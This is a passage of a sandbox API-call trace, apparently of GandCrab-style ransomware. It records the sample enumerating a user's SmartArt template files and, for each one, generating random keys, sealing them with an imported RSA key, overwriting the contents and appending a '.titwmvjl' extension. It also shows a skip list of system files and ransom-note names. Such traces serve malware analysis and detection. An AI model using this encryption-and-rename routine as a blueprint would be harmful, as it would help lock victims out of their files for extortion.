[0078.550] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0078.550] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.550] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.550] CryptAcquireContextW (in: phProv=0x259df00, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259df00*=0x4cdb38) returned 1 [0078.637] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2650000 [0078.637] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0078.638] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0078.638] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x8, pbBuffer=0x259dfac | out: pbBuffer=0x259dfac) returned 1 [0078.638] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.638] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0078.638] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.638] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.639] CryptAcquireContextW (in: phProv=0x259def4, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259def4*=0x4cdb38) returned 1 [0078.643] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.643] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259def8 | out: phKey=0x259def8*=0x503978) returned 1 [0078.643] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.643] CryptGetKeyParam (in: hKey=0x503978, dwParam=0x8, pbData=0x259deec, pdwDataLen=0x259def0, dwFlags=0x0 | out: pbData=0x259deec*=0x800, pdwDataLen=0x259def0*=0x4) returned 1 [0078.643] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.644] CryptEncrypt (in: hKey=0x503978, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630000*, pdwDataLen=0x259df24*=0xc8, dwBufLen=0x100 | out: pbData=0x2630000*, pdwDataLen=0x259df24*=0x100) returned 1 [0078.644] GetLastError () returned 0x0 [0078.644] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.644] CryptDestroyKey (hKey=0x503978) returned 1 [0078.644] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.644] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0078.645] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.645] CryptAcquireContextW (in: phProv=0x259def4, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259def4*=0x4cdb38) returned 1 [0078.649] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.649] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259def8 | out: phKey=0x259def8*=0x5034b8) returned 1 [0078.650] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.650] CryptGetKeyParam (in: hKey=0x5034b8, dwParam=0x8, pbData=0x259deec, pdwDataLen=0x259def0, dwFlags=0x0 | out: pbData=0x259deec*=0x800, pdwDataLen=0x259def0*=0x4) returned 1 [0078.650] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.650] CryptEncrypt (in: hKey=0x5034b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630100*, pdwDataLen=0x259df24*=0xc8, dwBufLen=0x100 | out: pbData=0x2630100*, pdwDataLen=0x259df24*=0x100) returned 1 [0078.650] GetLastError () returned 0x0 [0078.650] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.651] CryptDestroyKey (hKey=0x5034b8) returned 1 [0078.651] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.651] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0078.651] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0078.651] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0078.652] ReadFile (in: hFile=0x2ec, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259dfd0, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259dfd0*=0x1cca, lpOverlapped=0x0) returned 1 [0078.663] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0xffffe336, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.663] WriteFile (in: hFile=0x2ec, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x1cca, lpNumberOfBytesWritten=0x259dfb4, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259dfb4*=0x1cca, lpOverlapped=0x0) returned 1 [0078.664] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.664] WriteFile (in: hFile=0x2ec, lpBuffer=0x2630000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259dfb4, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesWritten=0x259dfb4*=0x21c, lpOverlapped=0x0) returned 1 [0078.667] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.672] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.672] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.672] CloseHandle (hObject=0x2ec) returned 1 [0078.674] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328935[[fn=Picture Organization Chart]].glox" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\smartart graphics\\1033\\tm03328935[[fn=picture organization chart]].glox"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328935[[fn=Picture Organization Chart]].glox.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\smartart graphics\\1033\\tm03328935[[fn=picture organization chart]].glox.titwmvjl"), dwFlags=0x1) returned 1 [0078.675] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.675] FindNextFileW (in: hFindFile=0x503738, lpFindFileData=0x259e084 | out: lpFindFileData=0x259e084) returned 1 [0078.675] lstrcmpW (lpString1="TM03328940[[fn=Radial Picture List]].glox", lpString2=".") returned 1 [0078.675] lstrcmpW (lpString1="TM03328940[[fn=Radial Picture List]].glox", lpString2="..") returned 1 [0078.675] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\", lpString2="TM03328940[[fn=Radial Picture List]].glox" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328940[[fn=Radial Picture List]].glox") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328940[[fn=Radial Picture List]].glox" [0078.676] lstrlenW (lpString=".titwmvjl") returned 9 [0078.676] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328940[[fn=Radial Picture List]].glox") returned 145 [0078.676] VirtualAlloc (lpAddress=0x0, dwSize=0x162, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0078.676] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328940[[fn=Radial Picture List]].glox.titwmvjl") returned 154 [0078.676] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328940[[fn=Radial Picture List]].glox") returned 145 [0078.676] lstrlenW (lpString=".glox") returned 5 [0078.676] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0078.676] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".glox ") returned 6 [0078.676] lstrcmpiW (lpString1=".glox", lpString2=".titwmvjl") returned -1 [0078.676] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.677] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328940[[fn=Radial Picture List]].glox") returned 145 [0078.677] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328940[[fn=Radial Picture List]].glox") returned 145 [0078.677] lstrcmpiW (lpString1="TM03328940[[fn=Radial Picture List]].glox", lpString2="desktop.ini") returned 1 [0078.677] lstrcmpiW (lpString1="TM03328940[[fn=Radial Picture List]].glox", lpString2="autorun.inf") returned 1 [0078.677] lstrcmpiW (lpString1="TM03328940[[fn=Radial Picture List]].glox", lpString2="ntuser.dat") returned 1 [0078.677] lstrcmpiW (lpString1="TM03328940[[fn=Radial Picture List]].glox", lpString2="iconcache.db") returned 1 [0078.677] lstrcmpiW (lpString1="TM03328940[[fn=Radial Picture List]].glox", lpString2="bootsect.bak") returned 1 [0078.677] lstrcmpiW (lpString1="TM03328940[[fn=Radial Picture List]].glox", lpString2="boot.ini") returned 1 [0078.677] lstrcmpiW (lpString1="TM03328940[[fn=Radial Picture List]].glox", lpString2="ntuser.dat.log") returned 1 [0078.677] lstrcmpiW (lpString1="TM03328940[[fn=Radial Picture List]].glox", lpString2="thumbs.db") returned 1 [0078.677] lstrcmpiW (lpString1="TM03328940[[fn=Radial Picture List]].glox", lpString2="TITWMVJL-DECRYPT.txt") returned 1 [0078.677] lstrcmpiW (lpString1="TM03328940[[fn=Radial Picture List]].glox", lpString2="TITWMVJL-DECRYPT.html") returned 1 [0078.677] lstrcmpiW (lpString1="TM03328940[[fn=Radial Picture List]].glox", lpString2="KRAB-DECRYPT.html") returned 1 [0078.678] lstrcmpiW (lpString1="TM03328940[[fn=Radial Picture List]].glox", lpString2="CRAB-DECRYPT.html") returned 1 [0078.678] lstrcmpiW (lpString1="TM03328940[[fn=Radial Picture List]].glox", lpString2="KRAB-DECRYPT.txt") returned 1 [0078.678] lstrcmpiW (lpString1="TM03328940[[fn=Radial Picture List]].glox", lpString2="CRAB-DECRYPT.txt") returned 1 [0078.678] lstrcmpiW (lpString1="TM03328940[[fn=Radial Picture List]].glox", lpString2="ntldr") returned 1 [0078.678] lstrcmpiW (lpString1="TM03328940[[fn=Radial Picture List]].glox", lpString2="NTDETECT.COM") returned 1 [0078.678] lstrcmpiW (lpString1="TM03328940[[fn=Radial Picture List]].glox", lpString2="Bootfont.bin") returned 1 [0078.678] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328940[[fn=Radial Picture List]].glox") returned 145 [0078.678] lstrlenW (lpString=".glox") returned 5 [0078.678] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0078.678] wsprintfW (in: param_1=0x2630000, param_2="%s " | out: param_1=".glox ") returned 6 [0078.678] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.678] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0078.679] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328940[[fn=Radial Picture List]].glox" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\smartart graphics\\1033\\tm03328940[[fn=radial picture list]].glox"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2ec [0078.679] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.679] ReadFile (in: hFile=0x2ec, lpBuffer=0x2630000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259dfd0, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesRead=0x259dfd0*=0x21c, lpOverlapped=0x0) returned 1 [0078.694] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.694] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.694] CryptAcquireContextW (in: phProv=0x259df00, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259df00*=0x4cdb38) returned 1 [0078.698] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2650000 [0078.698] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0078.699] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0078.699] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x20, pbBuffer=0x259df8c | out: pbBuffer=0x259df8c) returned 1 [0078.699] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.699] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0078.699] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.699] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.699] CryptAcquireContextW (in: phProv=0x259df00, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259df00*=0x4cdb38) returned 1 [0078.703] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2650000 [0078.703] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0078.703] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0078.703] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x8, pbBuffer=0x259dfac | out: pbBuffer=0x259dfac) returned 1 [0078.704] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.704] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0078.704] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.704] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.704] CryptAcquireContextW (in: phProv=0x259def4, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259def4*=0x4cdb38) returned 1 [0078.708] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.708] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259def8 | out: phKey=0x259def8*=0x5034b8) returned 1 [0078.708] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.709] CryptGetKeyParam (in: hKey=0x5034b8, dwParam=0x8, pbData=0x259deec, pdwDataLen=0x259def0, dwFlags=0x0 | out: pbData=0x259deec*=0x800, pdwDataLen=0x259def0*=0x4) returned 1 [0078.709] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.709] CryptEncrypt (in: hKey=0x5034b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630000*, pdwDataLen=0x259df24*=0xc8, dwBufLen=0x100 | out: pbData=0x2630000*, pdwDataLen=0x259df24*=0x100) returned 1 [0078.709] GetLastError () returned 0x0 [0078.709] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.709] CryptDestroyKey (hKey=0x5034b8) returned 1 [0078.709] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.710] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0078.710] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.710] CryptAcquireContextW (in: phProv=0x259def4, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259def4*=0x4cdb38) returned 1 [0078.713] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.713] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259def8 | out: phKey=0x259def8*=0x503978) returned 1 [0078.713] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.713] CryptGetKeyParam (in: hKey=0x503978, dwParam=0x8, pbData=0x259deec, pdwDataLen=0x259def0, dwFlags=0x0 | out: pbData=0x259deec*=0x800, pdwDataLen=0x259def0*=0x4) returned 1 [0078.714] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.714] CryptEncrypt (in: hKey=0x503978, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630100*, pdwDataLen=0x259df24*=0xc8, dwBufLen=0x100 | out: pbData=0x2630100*, pdwDataLen=0x259df24*=0x100) returned 1 [0078.714] GetLastError () returned 0x0 [0078.714] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.714] CryptDestroyKey (hKey=0x503978) returned 1 [0078.714] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.714] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0078.714] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0078.714] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0078.715] ReadFile (in: hFile=0x2ec, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259dfd0, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259dfd0*=0x15dc, lpOverlapped=0x0) returned 1 [0078.727] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0xffffea24, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.728] WriteFile (in: hFile=0x2ec, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x15dc, lpNumberOfBytesWritten=0x259dfb4, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259dfb4*=0x15dc, lpOverlapped=0x0) returned 1 [0078.729] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.729] WriteFile (in: hFile=0x2ec, lpBuffer=0x2630000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259dfb4, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesWritten=0x259dfb4*=0x21c, lpOverlapped=0x0) returned 1 [0078.730] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.734] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.734] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.734] CloseHandle (hObject=0x2ec) returned 1 [0078.735] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328940[[fn=Radial Picture List]].glox" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\smartart graphics\\1033\\tm03328940[[fn=radial picture list]].glox"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328940[[fn=Radial Picture List]].glox.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\smartart graphics\\1033\\tm03328940[[fn=radial picture list]].glox.titwmvjl"), dwFlags=0x1) returned 1 [0078.736] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.736] FindNextFileW (in: hFindFile=0x503738, lpFindFileData=0x259e084 | out: lpFindFileData=0x259e084) returned 1 [0078.736] lstrcmpW (lpString1="TM03328951[[fn=Tabbed Arc]].glox", lpString2=".") returned 1 [0078.736] lstrcmpW (lpString1="TM03328951[[fn=Tabbed Arc]].glox", lpString2="..") returned 1 [0078.736] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\", lpString2="TM03328951[[fn=Tabbed Arc]].glox" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328951[[fn=Tabbed Arc]].glox") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328951[[fn=Tabbed Arc]].glox" [0078.736] lstrlenW (lpString=".titwmvjl") returned 9 [0078.736] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328951[[fn=Tabbed Arc]].glox") returned 136 [0078.736] VirtualAlloc (lpAddress=0x0, dwSize=0x150, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0078.737] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328951[[fn=Tabbed Arc]].glox.titwmvjl") returned 145 [0078.737] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328951[[fn=Tabbed Arc]].glox") returned 136 [0078.737] lstrlenW (lpString=".glox") returned 5 [0078.737] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0078.737] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".glox ") returned 6 [0078.737] lstrcmpiW (lpString1=".glox", lpString2=".titwmvjl") returned -1 [0078.737] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.737] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328951[[fn=Tabbed Arc]].glox") returned 136 [0078.737] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328951[[fn=Tabbed Arc]].glox") returned 136 [0078.737] lstrcmpiW (lpString1="TM03328951[[fn=Tabbed Arc]].glox", lpString2="desktop.ini") returned 1 [0078.737] lstrcmpiW (lpString1="TM03328951[[fn=Tabbed Arc]].glox", lpString2="autorun.inf") returned 1 [0078.737] lstrcmpiW (lpString1="TM03328951[[fn=Tabbed Arc]].glox", lpString2="ntuser.dat") returned 1 [0078.737] lstrcmpiW (lpString1="TM03328951[[fn=Tabbed Arc]].glox", lpString2="iconcache.db") returned 1 [0078.737] lstrcmpiW (lpString1="TM03328951[[fn=Tabbed Arc]].glox", lpString2="bootsect.bak") returned 1 [0078.737] lstrcmpiW (lpString1="TM03328951[[fn=Tabbed Arc]].glox", lpString2="boot.ini") returned 1 [0078.737] lstrcmpiW (lpString1="TM03328951[[fn=Tabbed Arc]].glox", lpString2="ntuser.dat.log") returned 1 [0078.737] lstrcmpiW (lpString1="TM03328951[[fn=Tabbed Arc]].glox", lpString2="thumbs.db") returned 1 [0078.737] lstrcmpiW (lpString1="TM03328951[[fn=Tabbed Arc]].glox", lpString2="TITWMVJL-DECRYPT.txt") returned 1 [0078.737] lstrcmpiW (lpString1="TM03328951[[fn=Tabbed Arc]].glox", lpString2="TITWMVJL-DECRYPT.html") returned 1 [0078.737] lstrcmpiW (lpString1="TM03328951[[fn=Tabbed Arc]].glox", lpString2="KRAB-DECRYPT.html") returned 1 [0078.737] lstrcmpiW (lpString1="TM03328951[[fn=Tabbed Arc]].glox", lpString2="CRAB-DECRYPT.html") returned 1 [0078.737] lstrcmpiW (lpString1="TM03328951[[fn=Tabbed Arc]].glox", lpString2="KRAB-DECRYPT.txt") returned 1 [0078.737] lstrcmpiW (lpString1="TM03328951[[fn=Tabbed Arc]].glox", lpString2="CRAB-DECRYPT.txt") returned 1 [0078.737] lstrcmpiW (lpString1="TM03328951[[fn=Tabbed Arc]].glox", lpString2="ntldr") returned 1 [0078.738] lstrcmpiW (lpString1="TM03328951[[fn=Tabbed Arc]].glox", lpString2="NTDETECT.COM") returned 1 [0078.738] lstrcmpiW (lpString1="TM03328951[[fn=Tabbed Arc]].glox", lpString2="Bootfont.bin") returned 1 [0078.738] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328951[[fn=Tabbed Arc]].glox") returned 136 [0078.738] lstrlenW (lpString=".glox") returned 5 [0078.738] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0078.738] wsprintfW (in: param_1=0x2630000, param_2="%s " | out: param_1=".glox ") returned 6 [0078.738] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.738] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0078.738] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328951[[fn=Tabbed Arc]].glox" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\smartart graphics\\1033\\tm03328951[[fn=tabbed arc]].glox"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2ec [0078.739] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.739] ReadFile (in: hFile=0x2ec, lpBuffer=0x2630000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259dfd0, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesRead=0x259dfd0*=0x21c, lpOverlapped=0x0) returned 1 [0078.750] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.750] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.750] CryptAcquireContextW (in: phProv=0x259df00, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259df00*=0x4cdb38) returned 1 [0078.753] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 